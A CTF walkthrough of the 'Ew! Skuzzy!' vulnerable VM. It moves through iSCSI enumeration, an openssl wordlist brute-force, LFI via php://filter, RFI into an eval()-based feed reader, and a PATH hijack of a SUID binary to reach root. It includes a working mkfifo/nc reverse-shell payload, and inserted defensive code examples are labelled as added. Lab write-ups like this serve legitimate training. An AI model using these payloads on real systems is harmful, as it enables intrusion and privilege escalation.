Infosec, CTF and more

Ew! Skuzzy! Solution

In this post I’m going to show you how to solve the Ew! Skuzzy! VM provided by vortex.

You can find the VM on this link

The goal of the VM is to gain root access to the machine and capture 5 flags.


I run an nmap scan against the victim, and this is what I get:

Nmap scan report for
Host is up (0.00017s latency).
Not shown: 65532 closed ports
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I visit the URL and this is what I get:

______            _____ __                         __
/ ____/      __   / ___// /____  __________  __  __/ /
/ __/ | | /| / /   \__ \/ //_/ / / /_  /_  / / / / / / 
/ /___ | |/ |/ /   ___/ / ,< / /_/ / / /_/ /_/ /_/ /_/  
/_____/ |__/|__/   /____/_/|_|\__,_/ /___/___/\__, (_)   
Welcome to 'Ew Skuzzy!' - my first CTF VM. 
Level: Intermediate.

Forgive the name... I heard a kid say it in a shopping centre; Or, perhaps it's a hint? Or am I trolling? ¯\_(ツ)_/¯ 

You'll just have to fireup dirbuster and find out! 

Flags will be found along the way, if you're on the right path. Most flag data is not of any signifigance to the challenge.

Hints available at /dev/null, or ping me on Twitter @vortexau (UTC+9.5 timezone, I'm probably sleeping while you're awake!).

Please let me know what you think of the challenge once you're done, and submit your walkthroughs to VulnHub, I'm really looking forward to reading them!

So, the machine invites me to run dirbuster, so I start it with the big.txt wordlist to find out what is hidden. This wordlist discovers the following URL, but the page returns an HTTP 403 Forbidden error.

I look at the whole URL: the word smblogin on its own doesn’t return anything interesting, but googling smblogin custom-log arquivos url returns a link to the wordlist common_and_portuguese.txt from the SecLists wordlist collection. So I run dirb again with this wordlist and I find the URL

I open the URL and I find an image of Lionel Richie that says Hello? Is it flags you're looking for. Nice, looks like he was quite young, but I have a look at the source code of the page and I find a comment:


It’s encoded in Base64, so I decode it and this is what I get:

$ cat comment_lionel.txt | base64 -d
cat comment_lionel.txt | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do
And I want to tell you so much, no flags for you...

Right, this is a modified version of the song “Hello” by Lionel Richie. Looks like a troll, but he talks about ports “open wide”, and there’s a port that I’ve checked, but nothing returns: port 3260. I check what service should be running on port 3260:

$ whatportis 3260
| Name         | Port | Protocol | Description |
| iscsi-target | 3260 |   tcp    | iSCSI port  |
| iscsi-target | 3260 |   udp    | iSCSI port  |

iSCSI Service, and looks like nmap kinda agrees:

$ nmap -sV -p 3260 -Pn -n -v

Scanning [1 port]
Discovered open port 3260/tcp on
Completed Connect Scan at 05:11, 0.00s elapsed (1 total ports)
Initiating Service scan at 05:11
Scanning 1 service on
Completed Service scan at 05:12, 93.59s elapsed (1 service on 1 host)
NSE: Script scanning
Initiating NSE at 05:12
Completed NSE at 05:12, 1.36s elapsed
Nmap scan report for
Host is up (0.00024s latency).
3260/tcp open  iscsi?

I have a look on Wikipedia about this service, and something gets my attention:

In computing, iSCSI (/aɪˈskʌzi/ eye-skuz-ee) is an acronym for Internet Small Computer Systems Interface

Did you see it? eye-skuz-ee, quite similar to the name of the VM…I might be on the right path.

So, I follow the guide on to connect to this system.

# iscsiadm --mode discovery --type sendtargets --portal,1 iqn.2017-02.local.skuzzy:storage.sys0

Always following the guide, I found the record id by the discovery, and now I need to login to mount the disk on my machine:

# iscsiadm --mode node --targetname iqn.2017-02.local.skuzzy:storage.sys0 --portal --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal:,3260] successful.

# df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            9.6G     0  9.6G   0% /dev
tmpfs           2.0G   14M  2.0G   1% /run
/dev/sda1        95G   74G   17G  82% /
tmpfs           9.6G   34M  9.6G   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           9.6G     0  9.6G   0% /sys/fs/cgroup
cgmfs           100K     0  100K   0% /run/cgmanager/fs
tmpfs           2.0G   80K  2.0G   1% /run/user/1000
/dev/sdc        976M  1.8M  907M   1% /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e

Bingo, look at /dev/sdc, mounted on /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e, there’s the flag1.txt

# ls -lah /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e
total 556K
drwxr-xr-x  3 root root 4.0K Feb 28 08:56 .
drwxr-x---+ 5 root root 4.0K Mar 22 05:23 ..
-rw-r--r--  1 root root 100M Mar  5 09:00 bobsdisk.dsk
-rw-r--r--  1 root root  143 Feb 28 08:48 flag1.txt
drwx------  2 root root  16K Feb 28 08:39 lost+found

$ cat /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/flag1.txt
Congratulations! You've discovered the first flag!


Let's see how you go with the next one...

So, now there’s this file that looks like a disk image, so I mount it on my computer and look at the content:

# file /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk
/media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

# mkdir mount
mkdir mount

# mount ./bobsdisk.dsk mount/
mount ./bobsdisk.dsk mount/

# ls -la mount/
total 17
drwxr-xr-x 3 root    root     1024 Mar  5 09:00 .
drwxrwxrwx 1 anthony anthony   208 Mar 22 05:31 ..
drwx------ 2 root    root    12288 Feb 28 08:56 lost+found
-rw-r--r-- 1 root    root      288 Feb 28 09:25 ToAlice.csv.enc
-rw-r--r-- 1 root    root     2342 Mar  5 09:00 ToAlice.eml

An encrypted file and a message, and the second flag:

# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly.

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. 

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)



PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Right, so I do some research on how to decrypt an encrypted file with openssl, and following the hints in the message I see that I need to add -md sha256 to decrypt; the password must be in the rockyou.txt wordlist, since that is mentioned, so I come up with the following bash script:


PASSWORDS=$(cat "./rockyou.txt")

for PASSWORD in $PASSWORDS; do
    openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k "$PASSWORD" 2>/dev/null
    RET=$?
    if [ $RET -eq 0 ]; then
        echo "Candidate password: $PASSWORD"
    fi
done

With this script I find a bunch of false positives. I check online and find out that with AES in CBC mode openssl can only tell whether “decryption worked” by checking that the PKCS#7 padding of the last block is valid, so with a wrong key the command still exits successfully whenever the garbage plaintext happens to end in valid padding: the file is decrypted, but nothing is recovered.

This means that, based on the bunch of passwords recovered, I need to write another script to check the file, and perhaps check the content every time the file gets decrypted.

After almost a day, I got over 5000 false positives from the rockyou.txt wordlist (over 14 million passwords)… what to do then? Well, I have to run another script that checks the content of the file every time it gets decrypted. I wrote another script to do the same thing again (I know, I could’ve done this in the first place, but it didn’t pop into my mind at the time), logging everything into different files; then I wait until the script finishes and grep for words mentioned in the email. The script is the following:


PASSWORDS=$(cat "./passphrases.txt")

for PASSWORD in $PASSWORDS; do
    openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k "$PASSWORD" 2>/dev/null
    RET=$?
    if [ $RET -eq 0 ]; then
        echo "Found password: $PASSWORD" >> found.log
        cat ToAlice.csv > "test/$PASSWORD.log"
    fi
done
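To make the two checks the scripts above depend on explicit, here is an added Python example (my own code, not part of the original write-up or of the VM) that reproduces them with the standard library only: the EVP_BytesToKey derivation that openssl enc uses, so the same passphrase and salt give different keys under md5 and sha256 (which is why the -md sha256 hint matters); the PKCS#7 padding check, which is the only thing a plain openssl run verifies and which accepts a wrong key roughly once in 256 attempts; and the second-stage content check that separates a genuine decryption from those false positives. The CSV header it looks for, the salt and the sample decryption outputs are constructed for the example; it does not perform the AES decryption itself.

```python
import hashlib
import random
import string


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int = 32,
                     iv_len: int = 16, md: str = "sha256"):
    """Key/IV derivation used by 'openssl enc' (EVP_BytesToKey, one iteration).
    OpenSSL before 1.1.0 defaulted md to MD5, 1.1.0 and later to SHA-256, so
    the same passphrase yields a different key unless '-md' matches."""
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        prev = hashlib.new(md, prev + password + salt).digest()
        derived += prev
    return derived[:key_len], derived[key_len:key_len + iv_len]


def parse_openssl_blob(blob: bytes):
    """'openssl enc' output layout: magic 'Salted__', 8-byte salt, ciphertext."""
    if not blob.startswith(b"Salted__") or len(blob) < 16:
        raise ValueError("not an OpenSSL 'Salted__' file")
    return blob[8:16], blob[16:]


def pkcs7_pad(data: bytes, block_size: int = 16) -> bytes:
    n = block_size - len(data) % block_size
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes, block_size: int = 16):
    """The only check 'openssl enc -d' performs on a CBC decryption.
    Returns the unpadded bytes, or None when the padding is malformed."""
    if not data or len(data) % block_size != 0:
        return None
    n = data[-1]
    if n < 1 or n > block_size or data[-n:] != bytes([n]) * n:
        return None
    return data[:-n]


def padding_false_positive_rate(samples: int = 20000, seed: int = 1234) -> float:
    """Fraction of random final blocks (what a wrong key produces) that pass
    the padding check: about 1/256 from a trailing 0x01 plus smaller terms."""
    rnd = random.Random(seed)
    hits = sum(
        1 for _ in range(samples)
        if pkcs7_unpad(bytes(rnd.getrandbits(8) for _ in range(16))) is not None
    )
    return hits / samples


# Constructed for this example: the header the real ToAlice.csv starts with.
EXPECTED_HEADER = b"Web Path,Reason"
PRINTABLE = set(string.printable.encode())


def is_plausible_plaintext(decrypted: bytes) -> bool:
    """Second-stage check: printable text whose first line is the CSV header."""
    plain = pkcs7_unpad(decrypted)
    if plain is None or any(b not in PRINTABLE for b in plain):
        return False
    return plain.split(b"\n", 1)[0].strip() == EXPECTED_HEADER


def classify_candidate(decrypted: bytes) -> str:
    """'rejected': openssl itself errors out; 'padding-only': openssl reports
    success but the data is garbage; 'confirmed': the real document."""
    if pkcs7_unpad(decrypted) is None:
        return "rejected"
    return "confirmed" if is_plausible_plaintext(decrypted) else "padding-only"


if __name__ == "__main__":
    salt = b"\x01\x02\x03\x04\x05\x06\x07\x08"  # constructed salt
    for md in ("md5", "sha256"):
        key, iv = evp_bytes_to_key(b"supercalifragilisticoespialidoso", salt, md=md)
        print(f"{md:6s} key={key.hex()[:16]}... iv={iv.hex()[:16]}...")
    print("padding-only acceptance rate:", padding_false_positive_rate())
    for sample in (b"\x00" * 16,                                # fails padding
                   bytes(range(15)) + b"\x01",                  # passes padding, garbage
                   pkcs7_pad(b"Web Path,Reason\nabc,Nothing here\n")):
        print(classify_candidate(sample))
```

The classify_candidate split is the whole point of the second script on the page: a wordlist run that stops at openssl’s exit status is really a padding oracle, so every “successful” key must be confirmed against what the document is expected to look like.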

And, finally (man, it was a pain), I find that the passphrase was “supercalifragilisticoespialidoso”

# grep -i "hacker" ./*
./supercalifragilisticoespialidoso.log:5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 

# cat ./supercalifragilisticoespialidoso.log
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Finally, got third flag.

Based on the hashes of the file, I visit the URL and I find a page with the following source code:

<title>Hackers! They're everywhere!</title>
<body bgcolor="black" text="#00ff00">
<marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! HACKER DETECTED! HACKER DETECTED!</font></marquee>
Yeah, I'm bringing Marquee back, suckers!
Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Geocities style though! 
<img src="hacker.jpg" />

I decode the Base64 string and this is what I get:

# cat base64_hint.txt | base64 -d
cat base64_hint | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 

Another troll.

I then visit the URL and I find a web application called “My great web app”. I visit the URL but guess what? It’s another troll. I then visit the Feed Reader section, which has a URL parameter to load feeds: RFI doesn’t work, I tried but I get the error “Authentication invalid. You might need a key.” At this point I visit the URL called from the Feed section, and I find the following content:

This is some example source data for my nice little feed reader. I have designed my own nice little format which will allow it to include dynamic content. Who needs consultants when it's this easy? :) 

One of the best things is this will allow me to host my feed content to display on this page on an external server! So flexible :D

print("See? This is totally dynamic, generated by PHP right in my own little tool. Hacker proof, too, because there is a secret key required!");

Ok, basically the page parses the content of the data.txt and shows it in the page, using the keyword ##php## to run PHP code.

I visit the URL and I get the following output:

Now now.. We paid mega bucks to a big consultancy to mitigate skiddy tricks like that one! :trollface:

I instead try to visit and I get the following output:

<h1>My great web-app!</h1>

<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>


_____          _____                    |  |
|   __|_ _ _   |   __|___ _ _ ___ ___ _ _|  |
|   __| | | |  |__   |  _| | |- _|- _| | |__|
|_____|_____|  |_____|___|___|___|___|_  |__|

Intentionally Vulnerable VM! Do not expose to the Internet!

Developed By - vortex
twitter: @vortexau

Hints available at /dev/null (or ping me on Twitter)

Assigned IP:


<footer>Hack the Planet!</footer>

SWEET! Vulnerable to LFI.

I visit the URL, and the page renders the troll face again. I try using the php://filter wrapper through the Local File Inclusion to read the source code of the page, and this time I get the following output visiting

<h1>My great web-app!</h1>

<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>


Which, decoded from Base64, is the following:

$ cat flag_php_base64.txt | base64 -d
defined ('VIAINDEX') or die('Ooooh! So close..');
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
// Ok, ok. Here's your flag! 
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
// Well done, you're doing great so far!
// Next step. SHELL!
// Oh. That flag above? You're gonna need it... 
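From the defender’s side, the ?p= include and the php://filter trick both come down to the same thing: request data is allowed to choose which file gets included. As an added example (my own code, not the VM author’s; the page names, the docroot and the request samples are assumptions), here is the allowlist resolution that closes both, written in Python so it runs stand-alone:

```python
import os
from urllib.parse import urlsplit

# Constructed for this example: the names the app accepts in ?p= and the files
# they map to. Request data only ever selects a key; it never becomes a path.
PAGES = {
    "welcome": "welcome.php",
    "flag": "flag.php",
    "party": "party.php",
    "reader": "reader.php",
}
DOCROOT = "/var/www/html/app"   # assumed location, illustration only


class IncludeRejected(Exception):
    pass


def resolve_page(p, pages=PAGES, docroot=DOCROOT) -> str:
    """Map a ?p= value to the one file it may include, or raise IncludeRejected."""
    if not isinstance(p, str) or not p:
        raise IncludeRejected("missing page name")
    # Stream wrappers (php://filter, data:, expect:, http://) must never reach
    # include(): anything carrying a scheme is refused before any lookup.
    if urlsplit(p).scheme or "://" in p:
        raise IncludeRejected("wrappers are not allowed")
    # Separators, traversal and NUL bytes have no business in a page name.
    if any(ch in p for ch in "/\\\x00") or ".." in p:
        raise IncludeRejected("path characters are not allowed")
    # Exact allowlist match: no case folding, no appending of ".php".
    if p not in pages:
        raise IncludeRejected("unknown page")
    target = os.path.normpath(os.path.join(docroot, pages[p]))
    # Defence in depth: the resolved file must still sit under the docroot.
    if os.path.commonpath([docroot, target]) != docroot:
        raise IncludeRejected("resolved outside docroot")
    return target


def triage(requests):
    """Run a batch of constructed ?p= values and report what each would do."""
    outcome = {}
    for p in requests:
        try:
            outcome[p] = "include " + resolve_page(p)
        except IncludeRejected as exc:
            outcome[p] = "rejected: " + str(exc)
    return outcome


if __name__ == "__main__":
    for p, what in triage([
        "flag",
        "../../../../etc/passwd",
        "php://filter/convert.base64-encode/resource=flag",
        "data://text/plain,hello",
        "FLAG",
    ]).items():
        print(f"{p!r:55} -> {what}")
```

The order of the checks is deliberate: wrappers are refused before the allowlist lookup so that a later, more permissive mapping can never be reached through a scheme, and the final commonpath check guards against a misconfigured mapping rather than against the request.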

One more flag! Now I gotta get a shell.

The only page that could give me hope is /var/www/html/c2444910794e037ebd8aaf257178c90b/reader.php, so I visit the URL, copy the encoded content into a file, decode it and this is what I find:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    // (The host part of this pattern was lost when the page was extracted;
    // the original matched the VM's own address.)
    if(preg_match("#^", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
            $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck :) But.. You have the source anyway, right? :)
            if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
            }
        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        // Body elided on the page: the ##text## section is rendered here.
        print $text['1'];
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) {
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
        eval($php['1']);
    }
}
?>

So, we need to find a key to put in the key query-string parameter of reader.php in order to do RFI.

After a while and various attempts, I understand that the key is flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}, based on the message in the flag.php file (and it is exactly 47 characters long, as the check requires).

I set up a data.txt file, served from my machine, with the following content:

Ok, all set. I visit the reader URL with the key flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} multiple times in order to check which PHP functions are disabled, create a data.txt with a reverse shell command and eventually get a reverse shell. No function that could stop me from running shell commands is disabled, so I do the following:

# cat data.txt 
# php -S
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 14:47:16 2017
Listening on
Document root is /ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:49:46 2017] [200]: /data.txt
# vim data.txt
# cat data.txt 
shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f');
# php -S
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 19:15:02 2017
Listening on
Document root is /media/anthony/Anthony PT External/ctf/ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:51:11 2017] [200]: /data.txt

And on the other terminal I get a reverse shell:

# nc -lnvp 4444
Listening on [] (family 0, port 4444)
Connection from [] port 4444 [tcp/*] accepted (family 2, sport 41612)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
$ /sbin/ifconfig
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:60:88:83  
        inet addr:  Bcast:  Mask:
        inet6 addr: fe80::a00:27ff:fe60:8883/64 Scope:Link
        RX packets:832540 errors:179 dropped:0 overruns:0 frame:0
        TX packets:807697 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000 
        RX bytes:174883630 (174.8 MB)  TX bytes:508605160 (508.6 MB)
        Interrupt:19 Base address:0xd020 

lo        Link encap:Local Loopback  
        inet addr:  Mask:
        inet6 addr: ::1/128 Scope:Host
        UP LOOPBACK RUNNING  MTU:65536  Metric:1
        RX packets:278812 errors:0 dropped:0 overruns:0 frame:0
        TX packets:278812 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1 
        RX bytes:20637869 (20.6 MB)  TX bytes:20637869 (20.6 MB)

Perfect, I’m in.

I check the /etc/passwd file, and this is what I find:

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
skuzzy:x:1000:1000:skuzzy skuzbucket,,,:/home/skuzzy:/bin/bash

I wander around, and I find a bunch of files with the SUID set, in particular the file /opt/alicebackup:

www-data@skuzzy:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null

I run the file, and I see that the id command is run, and then an ssh connection is attempted:

www-data@skuzzy:/tmp$ cd /op	
cd /opt/
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ ./alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Temporary failure in name resolution
lost connection
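What makes alicebackup dangerous is visible in that output: a setuid-root binary runs id by its bare name, so the lookup follows whatever PATH the caller supplies. As an added example (my own code, not from the VM), the following Python shows the two halves of the problem from the defender’s side: how a bare command name resolves under a caller-controlled PATH versus a fixed one, and the environment a privileged helper should exec its children with. The fake id script, the directory and the variable values are constructed for the demonstration.

```python
import os
import shutil
import tempfile

# What a setuid helper should hand to anything it executes: a fixed search path
# and none of the variables a caller can use to redirect the loader or shell.
SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
CALLER_CONTROLLED = ("PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "IFS", "ENV", "BASH_ENV")


def resolve_command(name: str, path_env: str):
    """Which file a bare command name resolves to under a given PATH (the same
    first-match rule the shell uses); None when nothing matches."""
    return shutil.which(name, path=path_env)


def sanitized_environment(env: dict) -> dict:
    """Drop caller-controlled loader/shell variables and pin PATH."""
    clean = {k: v for k, v in env.items() if k not in CALLER_CONTROLLED}
    clean["PATH"] = SAFE_PATH
    return clean


def demo_path_hijack():
    """Place a fake 'id' in a writable directory, put that directory first in
    PATH, and compare what a bare 'id' resolves to with and without the
    sanitized environment. Returns three booleans: (lookup was redirected,
    lookup is safe after sanitizing, LD_PRELOAD was dropped and PATH pinned)."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "id")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho 'this is not /usr/bin/id'\n")  # constructed stand-in
        os.chmod(fake, 0o755)
        caller_env = {"PATH": tmp + ":" + SAFE_PATH,
                      "LD_PRELOAD": "/tmp/untrusted.so",   # constructed value
                      "HOME": "/var/www"}
        hijacked = resolve_command("id", caller_env["PATH"])
        clean = sanitized_environment(caller_env)
        safe = resolve_command("id", clean["PATH"])
        return (
            hijacked == fake,
            safe is None or not safe.startswith(tmp + os.sep),
            "LD_PRELOAD" not in clean and clean["PATH"] == SAFE_PATH,
        )


if __name__ == "__main__":
    print(demo_path_hijack())
```

In the real binary the equivalent fix is to call the helper by absolute path and to exec with an explicitly built environment rather than the inherited one; the Python above only models the lookup rule so the effect of each half can be checked on its own.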

At this point I copy /bin/sh into the /tmp folder under the name id, prepend /tmp to the PATH environment variable and run /opt/alicebackup, in order to execute a shell as root:

www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/opt$ clear
TERM environment variable not set.
www-data@skuzzy:/opt$ export TERM=linux
export TERM=linux
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/tmp$ cp /bin/sh id
cp /bin/sh id
www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@skuzzy:/tmp$ which id
which id
www-data@skuzzy:/tmp$ /opt/alicebackup
# whoami
# /usr/bin/id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
# cat flag.txt
cat flag.txt


You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email

Got root and the last flag!

I learnt some new things here, especially that I do have patience for brute-forcing sometimes :) and about iSCSI (or eye-skuz-ee). I’ve also enjoyed the author’s trolls, very nice!

Thank you to vortex for the VM and Vulnhub for hosting it.